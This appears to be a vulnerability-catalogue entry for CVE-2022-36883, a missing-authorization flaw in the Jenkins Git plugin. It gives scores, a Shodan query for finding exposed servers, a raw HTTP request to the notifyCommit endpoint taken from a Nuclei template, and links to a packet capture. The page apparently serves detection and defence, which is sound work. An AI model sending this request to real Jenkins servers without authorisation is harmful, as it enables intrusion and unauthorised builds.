🔙 목록으로 돌아가기

CVE-2022-36883: Jenkins Git <=4.11.3 - Missing Authorization

TitleJenkins Git <=4.11.3 - Missing Authorization
Authorc-sh0
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.
RemediationUpgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.79615
CVE IDCVE-2022-36883
CWE IDCWE-862
Shodan QueryX-Jenkinsx-jenkins
Tags cve cve2022 jenkins plugin git intrusive vuln

🔍 Vulnerability Description

Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /git/notifyCommit?url=38FBNv1nxaflYHIJqTkU74UkOsI&branches=38FBNv1nxaflYHIJqTkU74UkOsI HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36883.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-36883.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A